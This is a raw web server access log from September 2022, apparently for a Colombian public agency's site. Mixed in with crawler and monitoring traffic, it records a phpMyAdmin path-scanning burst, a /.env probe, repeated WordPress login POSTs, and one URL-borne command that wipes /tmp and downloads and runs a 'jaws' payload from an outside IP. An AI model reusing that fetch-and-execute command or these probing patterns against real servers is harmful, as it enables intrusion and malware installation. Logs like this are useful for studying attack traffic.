173.249.46.215 - - [19/Sep/2022:01:03:08 -0500] "GET /admin/web/index.php?lang=en HTTP/1.1" 404 1018
173.249.46.215 - - [19/Sep/2022:01:03:08 -0500] "GET /phpMyAdmin-5.2.0/index.php?lang=en HTTP/1.1" 403 1165
173.249.46.215 - - [19/Sep/2022:01:03:08 -0500] "GET /sql/phpmy-admin/index.php?lang=en HTTP/1.1" 404 1018
173.249.46.215 - - [19/Sep/2022:01:03:08 -0500] "GET /phpMyAdmin1/index.php?lang=en HTTP/1.1" 403 1165
173.249.46.215 - - [19/Sep/2022:01:03:08 -0500] "GET /mysql-admin/index.php?lang=en HTTP/1.1" 404 1018
173.249.46.215 - - [19/Sep/2022:01:03:09 -0500] "GET /phpmyadmin_/index.php?lang=en HTTP/1.1" 403 1165
173.249.46.215 - - [19/Sep/2022:01:03:09 -0500] "GET /phpmyAdmin/index.php?lang=en HTTP/1.1" 403 1165
173.249.46.215 - - [19/Sep/2022:01:03:09 -0500] "GET /phppma/index.php?lang=en HTTP/1.1" 404 1018
173.249.46.215 - - [19/Sep/2022:01:03:09 -0500] "GET /sql/phpMyAdmin/index.php?lang=en HTTP/1.1" 404 1018
173.249.46.215 - - [19/Sep/2022:01:03:09 -0500] "GET /administrator/phpMyAdmin/index.php?lang=en HTTP/1.1" 404 1018
173.249.46.215 - - [19/Sep/2022:01:03:09 -0500] "GET /sql/webadmin/index.php?lang=en HTTP/1.1" 404 1018
173.249.46.215 - - [19/Sep/2022:01:03:10 -0500] "GET /phpmyadmin2013/index.php?lang=en HTTP/1.1" 403 1165
173.249.46.215 - - [19/Sep/2022:01:03:10 -0500] "GET /phpmyadmin2016/index.php?lang=en HTTP/1.1" 403 1165
173.249.46.215 - - [19/Sep/2022:01:03:10 -0500] "GET /sql/phpMyAdmin2/index.php?lang=en HTTP/1.1" 404 1018
173.249.46.215 - - [19/Sep/2022:01:03:10 -0500] "GET /db/phpMyAdmin/index.php?lang=en HTTP/1.1" 404 1018
173.249.46.215 - - [19/Sep/2022:01:03:10 -0500] "GET /PMA/index.php?lang=en HTTP/1.1" 404 1018
173.249.46.215 - - [19/Sep/2022:01:03:11 -0500] "GET /mysqlmanager/index.php?lang=en HTTP/1.1" 404 1018
173.249.46.215 - - [19/Sep/2022:01:03:11 -0500] "GET /administrator/pma/index.php?lang=en HTTP/1.1" 404 1018
173.249.46.215 - - [19/Sep/2022:01:03:11 -0500] "GET /admin/phpmyadmin/index.php?lang=en HTTP/1.1" 404 1018
173.249.46.215 - - [19/Sep/2022:01:03:11 -0500] "GET /phpmyadmin2015/index.php?lang=en HTTP/1.1" 403 1165
173.249.46.215 - - [19/Sep/2022:01:03:11 -0500] "GET /db/phpmyadmin3/index.php?lang=en HTTP/1.1" 404 1018
173.249.46.215 - - [19/Sep/2022:01:03:11 -0500] "GET /_phpmyadmin/index.php?lang=en HTTP/1.1" 404 1018
173.249.46.215 - - [19/Sep/2022:01:03:12 -0500] "GET /program/index.php?lang=en HTTP/1.1" 404 1018
173.249.46.215 - - [19/Sep/2022:01:03:12 -0500] "GET /db/dbadmin/index.php?lang=en HTTP/1.1" 404 1018
173.249.46.215 - - [19/Sep/2022:01:03:12 -0500] "GET /phpmyadmin2012/index.php?lang=en HTTP/1.1" 403 1165
173.249.46.215 - - [19/Sep/2022:01:03:12 -0500] "GET /phpmyadmin2019/index.php?lang=en HTTP/1.1" 403 1165
173.249.46.215 - - [19/Sep/2022:01:03:12 -0500] "GET /admin/sqladmin/index.php?lang=en HTTP/1.1" 404 1018
173.249.46.215 - - [19/Sep/2022:01:03:13 -0500] "GET /admin/db/index.php?lang=en HTTP/1.1" 404 1018
173.249.46.215 - - [19/Sep/2022:01:03:13 -0500] "GET /mysql/admin/index.php?lang=en HTTP/1.1" 404 1018
173.249.46.215 - - [19/Sep/2022:01:03:13 -0500] "GET /db/phpMyAdmin3/index.php?lang=en HTTP/1.1" 404 1018
173.249.46.215 - - [19/Sep/2022:01:03:13 -0500] "GET /php-my-admin/index.php?lang=en HTTP/1.1" 404 1018
173.249.46.215 - - [19/Sep/2022:01:03:13 -0500] "GET /phpMyAdmin/index.php?lang=en HTTP/1.1" 403 1165
173.249.46.215 - - [19/Sep/2022:01:03:13 -0500] "GET /phpmy-admin/index.php?lang=en HTTP/1.1" 404 1018
173.249.46.215 - - [19/Sep/2022:01:03:14 -0500] "GET /phpmyadmin2/index.php?lang=en HTTP/1.1" 403 1165
173.249.46.215 - - [19/Sep/2022:01:03:14 -0500] "GET /phpMyAdmin-4.9.7/index.php?lang=en HTTP/1.1" 403 1165
173.249.46.215 - - [19/Sep/2022:01:03:14 -0500] "GET /mysql/db/index.php?lang=en HTTP/1.1" 404 1018
173.249.46.215 - - [19/Sep/2022:01:03:14 -0500] "GET /administrator/phpmyadmin/index.php?lang=en HTTP/1.1" 404 1018
173.249.46.215 - - [19/Sep/2022:01:03:14 -0500] "GET /sql/sql-admin/index.php?lang=en HTTP/1.1" 404 1018
173.249.46.215 - - [19/Sep/2022:01:03:15 -0500] "GET /sql/myadmin/index.php?lang=en HTTP/1.1" 404 1018
173.249.46.215 - - [19/Sep/2022:01:03:15 -0500] "GET /MyAdmin/index.php?lang=en HTTP/1.1" 404 1018
173.249.46.215 - - [19/Sep/2022:01:03:15 -0500] "GET /phpMyAdmin5.2/index.php?lang=en HTTP/1.1" 403 1165
173.249.46.215 - - [19/Sep/2022:01:03:15 -0500] "GET /phpmyadmin2020/index.php?lang=en HTTP/1.1" 403 1165
173.249.46.215 - - [19/Sep/2022:01:03:15 -0500] "GET /sql/sqlweb/index.php?lang=en HTTP/1.1" 404 1018
173.249.46.215 - - [19/Sep/2022:01:03:15 -0500] "GET /sql/websql/index.php?lang=en HTTP/1.1" 404 1018
173.249.46.215 - - [19/Sep/2022:01:03:16 -0500] "GET /dbadmin/index.php?lang=en HTTP/1.1" 404 1018
173.249.46.215 - - [19/Sep/2022:01:03:16 -0500] "GET /mysqladmin/index.php?lang=en HTTP/1.1" 404 1018
173.249.46.215 - - [19/Sep/2022:01:03:16 -0500] "GET /admin/sysadmin/index.php?lang=en HTTP/1.1" 404 1018
173.249.46.215 - - [19/Sep/2022:01:03:16 -0500] "GET /phpMyAdmin5/index.php?lang=en HTTP/1.1" 403 1165
173.249.46.215 - - [19/Sep/2022:01:03:16 -0500] "GET /mysql/web/index.php?lang=en HTTP/1.1" 404 1018
173.249.46.215 - - [19/Sep/2022:01:03:17 -0500] "GET /sqlmanager/index.php?lang=en HTTP/1.1" 404 1018
173.249.46.215 - - [19/Sep/2022:01:03:17 -0500] "GET /administrator/PMA/index.php?lang=en HTTP/1.1" 404 1018
173.249.46.215 - - [19/Sep/2022:01:03:17 -0500] "GET /sql/phpmanager/index.php?lang=en HTTP/1.1" 404 1018
173.249.46.215 - - [19/Sep/2022:01:03:17 -0500] "GET /phpmyadmin2014/index.php?lang=en HTTP/1.1" 403 1165
173.249.46.215 - - [19/Sep/2022:01:03:17 -0500] "GET /php-myadmin/index.php?lang=en HTTP/1.1" 404 1018
173.249.46.215 - - [19/Sep/2022:01:03:17 -0500] "GET /wp-content/plugins/portable-phpmyadmin/wp-pma-mod/index.php?lang=en HTTP/1.1" 404 1018
173.249.46.215 - - [19/Sep/2022:01:03:18 -0500] "GET /db/phpmyadmin/index.php?lang=en HTTP/1.1" 404 1018
173.249.46.215 - - [19/Sep/2022:01:03:18 -0500] "GET /phpMyAdmin-5.1.0/index.php?lang=en HTTP/1.1" 403 1165
173.249.46.215 - - [19/Sep/2022:01:03:18 -0500] "GET /sql/sqladmin/index.php?lang=en HTTP/1.1" 404 1018
173.249.46.215 - - [19/Sep/2022:01:03:18 -0500] "GET /sql/webdb/index.php?lang=en HTTP/1.1" 404 1018
173.249.46.215 - - [19/Sep/2022:01:03:18 -0500] "GET /phpMyAdmin3/index.php?lang=en HTTP/1.1" 403 1165
173.249.46.215 - - [19/Sep/2022:01:03:19 -0500] "GET /admin/phpMyAdmin/index.php?lang=en HTTP/1.1" 404 1018
173.249.46.215 - - [19/Sep/2022:01:03:19 -0500] "GET /database/index.php?lang=en HTTP/1.1" 404 1018
173.249.46.215 - - [19/Sep/2022:01:03:19 -0500] "GET /sql/sql/index.php?lang=en HTTP/1.1" 404 1018
173.249.46.215 - - [19/Sep/2022:01:03:19 -0500] "GET /phpMyAdmin5.1/index.php?lang=en HTTP/1.1" 403 1165
173.249.46.215 - - [19/Sep/2022:01:03:19 -0500] "GET /mysql/dbadmin/index.php?lang=en HTTP/1.1" 404 1018
173.249.46.215 - - [19/Sep/2022:01:03:19 -0500] "GET /phpmyadmin2011/index.php?lang=en HTTP/1.1" 403 1165
173.249.46.215 - - [19/Sep/2022:01:03:20 -0500] "GET /phpmyadmin5/index.php?lang=en HTTP/1.1" 403 1165
173.249.46.215 - - [19/Sep/2022:01:03:20 -0500] "GET /administrator/db/index.php?lang=en HTTP/1.1" 404 1018
173.249.46.215 - - [19/Sep/2022:01:03:20 -0500] "GET /mysql/mysqlmanager/index.php?lang=en HTTP/1.1" 404 1018
173.249.46.215 - - [19/Sep/2022:01:03:20 -0500] "GET /mysql/pMA/index.php?lang=en HTTP/1.1" 404 1018
173.249.46.215 - - [19/Sep/2022:01:03:20 -0500] "GET /db/index.php?lang=en HTTP/1.1" 404 1018
173.249.46.215 - - [19/Sep/2022:01:03:21 -0500] "GET /db/webadmin/index.php?lang=en HTTP/1.1" 404 1018
173.249.46.215 - - [19/Sep/2022:01:03:21 -0500] "GET /pma/index.php?lang=en HTTP/1.1" 404 1018
173.249.46.215 - - [19/Sep/2022:01:03:21 -0500] "GET /db/myadmin/index.php?lang=en HTTP/1.1" 404 1018
173.249.46.215 - - [19/Sep/2022:01:03:21 -0500] "GET /phpMyAdmin4/index.php?lang=en HTTP/1.1" 403 1165
173.249.46.215 - - [19/Sep/2022:01:03:21 -0500] "GET /_phpMyAdmin/index.php?lang=en HTTP/1.1" 404 1018
173.249.46.215 - - [19/Sep/2022:01:03:21 -0500] "GET /sql/phpmyadmin3/index.php?lang=en HTTP/1.1" 404 1018
173.249.46.215 - - [19/Sep/2022:01:03:22 -0500] "GET /phpmyadmin4/index.php?lang=en HTTP/1.1" 403 1165
173.249.46.215 - - [19/Sep/2022:01:03:22 -0500] "GET /db/phpmyadmin5/index.php?lang=en HTTP/1.1" 404 1018
173.249.46.215 - - [19/Sep/2022:01:03:22 -0500] "GET /sql/php-myadmin/index.php?lang=en HTTP/1.1" 404 1018
173.249.46.215 - - [19/Sep/2022:01:03:22 -0500] "GET /myadmin/index.php?lang=en HTTP/1.1" 404 1018
173.249.46.215 - - [19/Sep/2022:01:03:22 -0500] "GET /mysql/index.php?lang=en HTTP/1.1" 404 1018
173.249.46.215 - - [19/Sep/2022:01:03:23 -0500] "GET /mysql/sqlmanager/index.php?lang=en HTTP/1.1" 404 1018
173.249.46.215 - - [19/Sep/2022:01:03:23 -0500] "GET /phpmyadmin/index.php?lang=en HTTP/1.1" 403 1165
173.249.46.215 - - [19/Sep/2022:01:03:23 -0500] "GET /db/websql/index.php?lang=en HTTP/1.1" 404 1018
173.249.46.215 - - [19/Sep/2022:01:03:23 -0500] "GET /phpmyadmin2021/index.php?lang=en HTTP/1.1" 403 1165
173.249.46.215 - - [19/Sep/2022:01:03:23 -0500] "GET /phpMyAdmin-5.1.3/index.php?lang=en HTTP/1.1" 403 1165
173.249.46.215 - - [19/Sep/2022:01:03:23 -0500] "GET /phpmy/index.php?lang=en HTTP/1.1" 404 1018
173.249.46.215 - - [19/Sep/2022:01:03:24 -0500] "GET /phpmyadmin2022/index.php?lang=en HTTP/1.1" 403 1165
173.249.46.215 - - [19/Sep/2022:01:03:24 -0500] "GET /phpmyadmin2018/index.php?lang=en HTTP/1.1" 403 1165
173.249.46.215 - - [19/Sep/2022:01:03:24 -0500] "GET /phpMyAdmin-5/index.php?lang=en HTTP/1.1" 403 1165
173.249.46.215 - - [19/Sep/2022:01:03:24 -0500] "GET /db/phpMyAdmin-3/index.php?lang=en HTTP/1.1" 404 1018
173.249.46.215 - - [19/Sep/2022:01:03:24 -0500] "GET /db/phpMyAdmin-4/index.php?lang=en HTTP/1.1" 404 1018
173.249.46.215 - - [19/Sep/2022:01:03:25 -0500] "GET /administrator/admin/index.php?lang=en HTTP/1.1" 404 1018
173.249.46.215 - - [19/Sep/2022:01:03:25 -0500] "GET /db/webdb/index.php?lang=en HTTP/1.1" 404 1018
173.249.46.215 - - [19/Sep/2022:01:03:25 -0500] "GET /db/phpMyAdmin-5/index.php?lang=en HTTP/1.1" 404 1018
173.249.46.215 - - [19/Sep/2022:01:03:25 -0500] "GET /_phpmyadmin_/index.php?lang=en HTTP/1.1" 404 1018
216.245.221.92 - - [19/Sep/2022:01:05:38 -0500] "HEAD / HTTP/1.1" 200 -
172.22.2.4 - - [19/Sep/2022:01:04:36 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
201.245.192.253 - - [19/Sep/2022:01:06:42 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 200 37989
172.22.2.4 - - [19/Sep/2022:01:05:26 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 52877
207.46.13.86 - - [19/Sep/2022:01:09:04 -0500] "GET /catalogoisis/js/remote.js HTTP/1.1" 200 436
152.61.128.50 - - [19/Sep/2022:01:09:32 -0500] "GET /arcgis/services/Calidad_del_Agua_WQI/MapServer/WMSServer?request=GetCapabilities&service=WMS HTTP/1.1" 503 1020
152.61.128.50 - - [19/Sep/2022:01:09:33 -0500] "GET /arcgis/services/Calidad_del_Agua_WQI/MapServer/WMSServer?SERVICE=WMS&REQUEST=GetCapabilities HTTP/1.1" 503 1020
152.61.128.50 - - [19/Sep/2022:01:09:33 -0500] "GET /arcgis/services/Calidad_del_Agua_WQI/MapServer/WMSServer?WMTVER=1.0.0&REQUEST=capabilities HTTP/1.1" 503 1020
207.46.13.176 - - [19/Sep/2022:01:09:49 -0500] "GET /portaldeninos/parque-mirador-de-los-nevados/ HTTP/1.1" 200 89855
157.55.39.201 - - [19/Sep/2022:01:09:51 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202021/0753.pdf HTTP/1.1" 200 510227
216.245.221.92 - - [19/Sep/2022:01:10:38 -0500] "HEAD / HTTP/1.1" 200 -
201.245.192.253 - - [19/Sep/2022:01:11:40 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 200 37989
172.22.2.4 - - [19/Sep/2022:01:10:26 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
34.150.94.243 - - [19/Sep/2022:01:12:07 -0500] "GET /shell?cd+/tmp;rm+-rf+*;wget+103.159.64.218/jaws;sh+/tmp/jaws HTTP/1.1" 404 1013
172.22.2.4 - - [19/Sep/2022:01:11:16 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 55220
66.249.66.85 - - [19/Sep/2022:01:13:44 -0500] "-" 408 -
207.46.13.131 - - [19/Sep/2022:01:14:23 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202000/2000%201850-1899.tif HTTP/1.1" 200 4512718
216.245.221.92 - - [19/Sep/2022:01:15:38 -0500] "HEAD / HTTP/1.1" 200 -
201.245.192.253 - - [19/Sep/2022:01:16:39 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 200 37989
157.55.39.201 - - [19/Sep/2022:01:17:23 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202022/0150.pdf HTTP/1.1" 304 -
172.22.2.4 - - [19/Sep/2022:01:16:16 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
172.22.2.4 - - [19/Sep/2022:01:17:06 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 52877
201.245.192.253 - - [19/Sep/2022:01:19:36 -0500] "POST /kwsrmcab/Wsrmcab HTTP/1.1" 200 42143
201.245.192.253 - - [19/Sep/2022:01:19:39 -0500] "POST /kwsrmcab/Wsrmcab HTTP/1.1" 200 42265
216.245.221.92 - - [19/Sep/2022:01:20:38 -0500] "HEAD / HTTP/1.1" 200 -
185.119.81.104 - - [19/Sep/2022:01:21:29 -0500] "GET /portaldeninos/wp-login.php HTTP/1.1" 200 2592
185.119.81.104 - - [19/Sep/2022:01:21:30 -0500] "POST /portaldeninos/wp-login.php HTTP/1.1" 200 3605
193.56.29.26 - - [19/Sep/2022:01:21:32 -0500] "HEAD / HTTP/1.1" 200 -
193.56.29.26 - - [19/Sep/2022:01:21:32 -0500] "GET /.env HTTP/1.1" 404 1018
193.56.29.26 - - [19/Sep/2022:01:21:33 -0500] "POST / HTTP/1.1" 200 319
201.245.192.253 - - [19/Sep/2022:01:21:39 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 200 37989
66.249.66.85 - - [19/Sep/2022:01:22:49 -0500] "-" 408 -
172.22.2.4 - - [19/Sep/2022:01:21:31 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 45003
172.22.2.4 - - [19/Sep/2022:01:23:45 -0500] "GET /BLA/boletinlegal/robots.txt HTTP/1.1" 404 1038
172.22.2.4 - - [19/Sep/2022:01:22:06 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
172.22.2.4 - - [19/Sep/2022:01:23:48 -0500] "GET /BLA/boletinlegal/actos.php HTTP/1.1" 200 9559
157.55.39.188 - - [19/Sep/2022:01:24:10 -0500] "GET /BLA/resoluciones/2002RES101.tif HTTP/1.1" 404 1018
172.22.2.4 - - [19/Sep/2022:01:22:56 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 58163
66.249.66.60 - - [19/Sep/2022:01:24:45 -0500] "-" 408 -
185.119.81.104 - - [19/Sep/2022:01:24:56 -0500] "GET /portaldeninos/wp-login.php HTTP/1.1" 200 2592
185.119.81.104 - - [19/Sep/2022:01:24:57 -0500] "POST /portaldeninos/wp-login.php HTTP/1.1" 200 3605
216.245.221.92 - - [19/Sep/2022:01:25:38 -0500] "HEAD / HTTP/1.1" 200 -
201.245.192.253 - - [19/Sep/2022:01:26:38 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 200 37989
190.156.185.197 - - [19/Sep/2022:01:28:02 -0500] "GET /BLA/resoluciones/AUTOS%202021/5617.pdf HTTP/1.1" 200 367447
172.22.2.4 - - [19/Sep/2022:01:27:56 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
201.245.192.253 - - [19/Sep/2022:01:29:36 -0500] "POST /kwsrmcab/Wsrmcab HTTP/1.1" 200 42143
201.245.192.253 - - [19/Sep/2022:01:29:40 -0500] "POST /kwsrmcab/Wsrmcab HTTP/1.1" 200 42265
172.22.2.4 - - [19/Sep/2022:01:28:46 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 58163
216.245.221.92 - - [19/Sep/2022:01:30:38 -0500] "HEAD / HTTP/1.1" 200 -
201.245.192.253 - - [19/Sep/2022:01:31:37 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 200 37989
157.55.39.201 - - [19/Sep/2022:01:32:53 -0500] "GET /Publicaciones/2022EE177908.pdf HTTP/1.1" 404 228
172.22.2.4 - - [19/Sep/2022:01:33:46 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
216.245.221.92 - - [19/Sep/2022:01:35:38 -0500] "HEAD / HTTP/1.1" 200 -
172.22.2.4 - - [19/Sep/2022:01:34:36 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 59828
201.245.192.253 - - [19/Sep/2022:01:36:37 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 200 37989
207.46.13.131 - - [19/Sep/2022:01:37:26 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202000/2000%202700-2749.tif HTTP/1.1" 200 3928129
172.22.2.4 - - [19/Sep/2022:01:37:30 -0500] "GET /BLA/boletinlegal/actos.php HTTP/1.1" 200 9559
172.22.2.4 - - [19/Sep/2022:01:37:37 -0500] "GET /BLA/boletinlegal/jurisprudencia/analisis/AnalisisT-606-15.docx HTTP/1.1" 200 26698
172.22.2.4 - - [19/Sep/2022:01:37:38 -0500] "GET /BLA/boletinlegal/apple-touch-icon-120x120-precomposed.png HTTP/1.1" 404 1140
172.22.2.4 - - [19/Sep/2022:01:37:38 -0500] "GET /BLA/boletinlegal/apple-touch-icon-120x120.png HTTP/1.1" 404 1140
172.22.2.4 - - [19/Sep/2022:01:37:38 -0500] "GET /BLA/boletinlegal/apple-touch-icon-precomposed.png HTTP/1.1" 404 1140
172.22.2.4 - - [19/Sep/2022:01:37:38 -0500] "GET /BLA/boletinlegal/apple-touch-icon.png HTTP/1.1" 404 1140
172.22.2.4 - - [19/Sep/2022:01:37:38 -0500] "GET /BLA/boletinlegal/favicon.ico HTTP/1.1" 404 1140
172.22.2.4 - - [19/Sep/2022:01:37:38 -0500] "GET /BLA/boletinlegal/apple-touch-icon-120x120-precomposed.png HTTP/1.1" 404 1140
172.22.2.4 - - [19/Sep/2022:01:37:38 -0500] "GET /BLA/boletinlegal/apple-touch-icon-120x120.png HTTP/1.1" 404 1140
172.22.2.4 - - [19/Sep/2022:01:37:38 -0500] "GET /BLA/boletinlegal/apple-touch-icon-precomposed.png HTTP/1.1" 404 1140
172.22.2.4 - - [19/Sep/2022:01:37:38 -0500] "GET /BLA/boletinlegal/apple-touch-icon.png HTTP/1.1" 404 1140
172.22.2.4 - - [19/Sep/2022:01:37:39 -0500] "GET /BLA/boletinlegal/favicon.ico HTTP/1.1" 404 1140
157.55.39.200 - - [19/Sep/2022:01:37:51 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202002/RES%202002%20101-150/2002RES105.tif HTTP/1.1" 200 93336
201.245.192.253 - - [19/Sep/2022:01:39:36 -0500] "POST /kwsrmcab/Wsrmcab HTTP/1.1" 200 42143
201.245.192.253 - - [19/Sep/2022:01:39:41 -0500] "POST /kwsrmcab/Wsrmcab HTTP/1.1" 200 42265
157.55.39.188 - - [19/Sep/2022:01:40:11 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202022/2295.pdf HTTP/1.1" 200 403527
216.245.221.92 - - [19/Sep/2022:01:40:38 -0500] "HEAD / HTTP/1.1" 200 -
172.22.2.4 - - [19/Sep/2022:01:39:36 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
201.245.192.253 - - [19/Sep/2022:01:41:36 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 200 37989
217.138.207.227 - - [19/Sep/2022:01:41:59 -0500] "GET / HTTP/1.1" 200 319
172.22.2.4 - - [19/Sep/2022:01:40:26 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 53290
117.214.223.18 - - [19/Sep/2022:01:42:54 -0500] "GET / HTTP/1.1" 200 319
172.22.2.4 - - [19/Sep/2022:01:42:05 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 60281
207.46.13.86 - - [19/Sep/2022:01:45:06 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202021/4500.pdf HTTP/1.1" 200 2845680
216.245.221.92 - - [19/Sep/2022:01:45:38 -0500] "HEAD / HTTP/1.1" 200 -
201.245.192.253 - - [19/Sep/2022:01:46:34 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 200 37989
172.22.2.4 - - [19/Sep/2022:01:45:26 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
172.22.2.4 - - [19/Sep/2022:01:46:16 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 52877
66.249.66.87 - - [19/Sep/2022:01:49:07 -0500] "-" 408 -
154.89.5.122 - - [19/Sep/2022:01:50:10 -0500] "GET / HTTP/1.0" 200 319
216.245.221.92 - - [19/Sep/2022:01:50:38 -0500] "HEAD / HTTP/1.1" 200 -
201.245.192.253 - - [19/Sep/2022:01:51:34 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 200 37989
157.55.39.202 - - [19/Sep/2022:01:52:54 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202000/2000%20550-599.tif HTTP/1.1" 200 4848758
172.22.2.4 - - [19/Sep/2022:01:51:16 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
172.22.2.4 - - [19/Sep/2022:01:52:06 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 57725
216.245.221.92 - - [19/Sep/2022:01:55:38 -0500] "HEAD / HTTP/1.1" 200 -
185.119.81.104 - - [19/Sep/2022:01:56:19 -0500] "GET /portaldeninos/wp-login.php HTTP/1.1" 200 2592
185.119.81.104 - - [19/Sep/2022:01:56:20 -0500] "POST /portaldeninos/wp-login.php HTTP/1.1" 200 3670
201.245.192.253 - - [19/Sep/2022:01:56:32 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 200 37989
172.22.2.4 - - [19/Sep/2022:01:57:06 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
207.46.13.131 - - [19/Sep/2022:01:58:58 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202000/2000%201950-1999.tif HTTP/1.1" 200 4490670
66.249.66.85 - - [19/Sep/2022:01:59:11 -0500] "-" 408 -
172.22.2.4 - - [19/Sep/2022:01:57:57 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 59319
216.245.221.92 - - [19/Sep/2022:02:00:38 -0500] "HEAD / HTTP/1.1" 200 -
201.245.192.253 - - [19/Sep/2022:02:01:31 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 200 37989
192.241.220.173 - - [19/Sep/2022:02:04:22 -0500] "GET / HTTP/1.1" 200 319
172.22.2.4 - - [19/Sep/2022:02:02:56 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
172.22.2.4 - - [19/Sep/2022:02:03:46 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 59828
216.245.221.92 - - [19/Sep/2022:02:05:38 -0500] "HEAD / HTTP/1.1" 200 -
201.245.192.253 - - [19/Sep/2022:02:06:30 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 200 37989
66.249.66.62 - - [19/Sep/2022:02:06:50 -0500] "-" 408 -
172.22.2.4 - - [19/Sep/2022:02:06:57 -0500] "GET /BLA/boletinlegal/Directivas/2011/Directiva%20No.%201%20del%205%20de%20Abril%20de%202011.pdf HTTP/1.1" 304 -
157.55.39.153 - - [19/Sep/2022:02:08:22 -0500] "GET /portaldeninos/2021/05/21/2070/ HTTP/1.1" 200 109949
207.46.13.176 - - [19/Sep/2022:02:08:35 -0500] "GET /portaldeninos/wp-content/themes/betheme/fonts/mfn-icons.ttf?93978679 HTTP/1.1" 200 124684
207.46.13.176 - - [19/Sep/2022:02:08:36 -0500] "GET /portaldeninos/wp-content/themes/betheme/js/plugins.js?ver=20.9.6 HTTP/1.1" 200 197151
207.46.13.176 - - [19/Sep/2022:02:08:37 -0500] "GET /portaldeninos/wp-includes/js/wp-emoji-release.min.js?ver=4.9.8 HTTP/1.1" 200 12026
207.46.13.184 - - [19/Sep/2022:02:08:38 -0500] "GET /portaldeninos/wp-content/plugins/gallery-videos/CSS/Total-Soft-Gallery-Video-Widget.css?ver=4.9.8 HTTP/1.1" 200 51554
157.55.39.154 - - [19/Sep/2022:02:08:39 -0500] "GET /portaldeninos/wp-includes/js/jquery/ui/tabs.min.js?ver=1.11.4 HTTP/1.1" 200 12110
157.55.39.161 - - [19/Sep/2022:02:08:43 -0500] "GET /portaldeninos/wp-content/plugins/gallery-videos/CSS/totalsoft.css?ver=4.9.8 HTTP/1.1" 200 40622
157.55.39.153 - - [19/Sep/2022:02:08:44 -0500] "GET /portaldeninos/wp-content/themes/betheme/assets/animations/animations.min.css?ver=20.9.6 HTTP/1.1" 200 58508
157.55.39.153 - - [19/Sep/2022:02:08:46 -0500] "GET /portaldeninos/wp-includes/js/jquery/ui/accordion.min.js?ver=1.11.4 HTTP/1.1" 200 8584
207.46.13.184 - - [19/Sep/2022:02:08:49 -0500] "GET /portaldeninos/wp-content/plugins/gallery-videos/JS/modernizr.custom.js?ver=4.9.8 HTTP/1.1" 200 9019
207.46.13.184 - - [19/Sep/2022:02:08:50 -0500] "GET /portaldeninos/wp-content/themes/betheme/assets/jplayer/css/jplayer.blue.monday.css?ver=20.9.6 HTTP/1.1" 200 9834
207.46.13.184 - - [19/Sep/2022:02:08:50 -0500] "GET /portaldeninos/wp-includes/js/comment-reply.min.js?ver=4.9.8 HTTP/1.1" 200 1078
207.46.13.184 - - [19/Sep/2022:02:08:50 -0500] "GET /portaldeninos/wp-includes/js/jquery/jquery-migrate.min.js?ver=1.4.1 HTTP/1.1" 200 10056
157.55.39.161 - - [19/Sep/2022:02:08:54 -0500] "GET /portaldeninos/wp-content/themes/betheme/assets/ui/jquery.ui.all.css?ver=20.9.6 HTTP/1.1" 200 18765
157.55.39.161 - - [19/Sep/2022:02:08:55 -0500] "GET /portaldeninos/wp-content/themes/betheme/css/layout.css?ver=20.9.6 HTTP/1.1" 200 116639
157.55.39.161 - - [19/Sep/2022:02:08:55 -0500] "GET /portaldeninos/wp-content/uploads/useanyfont/uaf.css?ver=1589905315 HTTP/1.1" 200 408
66.249.66.85 - - [19/Sep/2022:02:09:03 -0500] "-" 408 -
172.22.2.4 - - [19/Sep/2022:02:08:46 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
185.119.81.104 - - [19/Sep/2022:02:10:36 -0500] "GET /portaldeninos/wp-login.php HTTP/1.1" 200 2592
185.119.81.104 - - [19/Sep/2022:02:10:37 -0500] "POST /portaldeninos/wp-login.php HTTP/1.1" 200 3650
216.245.221.92 - - [19/Sep/2022:02:10:38 -0500] "HEAD / HTTP/1.1" 200 -
